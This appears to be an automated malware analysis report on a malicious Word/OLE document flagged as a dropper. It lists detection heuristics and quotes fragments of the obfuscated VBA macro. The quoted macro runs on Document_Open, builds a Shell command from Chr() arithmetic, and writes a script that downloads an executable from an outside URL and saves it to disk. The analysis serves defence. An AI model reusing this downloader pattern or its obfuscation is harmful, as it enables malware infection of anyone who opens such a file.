Malicious Office (OLE) — malware analysis report

Heuristics 10

• ClamAV: Doc.Dropper.Agent-6412232-1 critical CLAMAV_DETECTION
  ClamAV detected this file as malware: Doc.Dropper.Agent-6412232-1
• VBA macros detected medium 7 related findings OLE_VBA_MACROS
  Document contains VBA macro code
• Potential Shell call in VBA critical OLE_VBA_SHELL
  Potential Shell call in VBA
  Matched line in script

  Shell Chr(168 - 101) & Chr(604 - 527) & Chr(405 - 305) & Chr(906 - 874) & Chr(857 - 810) & Chr(812 - 713) & Chr(906 - 874) & Chr(812 - 713) & Chr(405 - 305) & _

• Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URL
  VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.
  Matched line in script

  Shell Chr(168 - 101) & Chr(604 - 527) & Chr(405 - 305) & Chr(906 - 874) & Chr(857 - 810) & Chr(812 - 713) & Chr(906 - 874) & Chr(812 - 713) & Chr(405 - 305) & _

• VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
  VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
  Matched line in script

   " & " & U2p & " J2k= ""http://rmzolaskharay.com/boy.exe"">>E6p.VBS &" & U2p & " P8x = F1e(""N\YZXKWO8ObO"")>>E6p.VBS &" & U2p & " Set L3b = CreateObject(F1e(""W]bWV<8bWVR^^Z""))>>E6p.VBS &" & U2p & " L3b.Open F1e(""QO^""), J2k, False>>E6p.VBS &" & U2p & " L3b.send ("""")>>E6p.VBS  &" & U2p & " Set T6i = CreateObject(F1e(""KNYNL8]^\OKW""))>>E6p.VBS &" & U2p & " T6i.Open>>E6p.VBS &" & U2p & " T6i.Type = 1 >>E6p.VBS  &@eCHo T6i.Write L3b.ResponseBody>>E6p.VBS &" & U2p & " T6i.Position = 0 >>E6p.VB …

• Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
  Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  Matched line in script

  Shell Chr(168 - 101) & Chr(604 - 527) & Chr(405 - 305) & Chr(906 - 874) & Chr(857 - 810) & Chr(812 - 713) & Chr(906 - 874) & Chr(812 - 713) & Chr(405 - 305) & _

• CreateObject call high OLE_VBA_CREATEOBJ
  CreateObject call
  Matched line in script

   " & " & U2p & " J2k= ""http://rmzolaskharay.com/boy.exe"">>E6p.VBS &" & U2p & " P8x = F1e(""N\YZXKWO8ObO"")>>E6p.VBS &" & U2p & " Set L3b = CreateObject(F1e(""W]bWV<8bWVR^^Z""))>>E6p.VBS &" & U2p & " L3b.Open F1e(""QO^""), J2k, False>>E6p.VBS &" & U2p & " L3b.send ("""")>>E6p.VBS  &" & U2p & " Set T6i = CreateObject(F1e(""KNYNL8]^\OKW""))>>E6p.VBS &" & U2p & " T6i.Open>>E6p.VBS &" & U2p & " T6i.Type = 1 >>E6p.VBS  &@eCHo T6i.Write L3b.ResponseBody>>E6p.VBS &" & U2p & " T6i.Position = 0 >>E6p.VB …

• VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
  Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
• Document_Open macro low OLE_VBA_DOCOPEN
  Document_Open macro
  Matched line in script

  Private Sub Document_Open()

• Embedded URL info EMBEDDED_URL
  One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL http://rmzolaskharay.com/boy.exe Referenced by macro

  • http://schemas.openxmlformats.org/drawingml/2006/mainReferenced by macro

Open this report in the interactive analyzer, or submit your own file for analysis.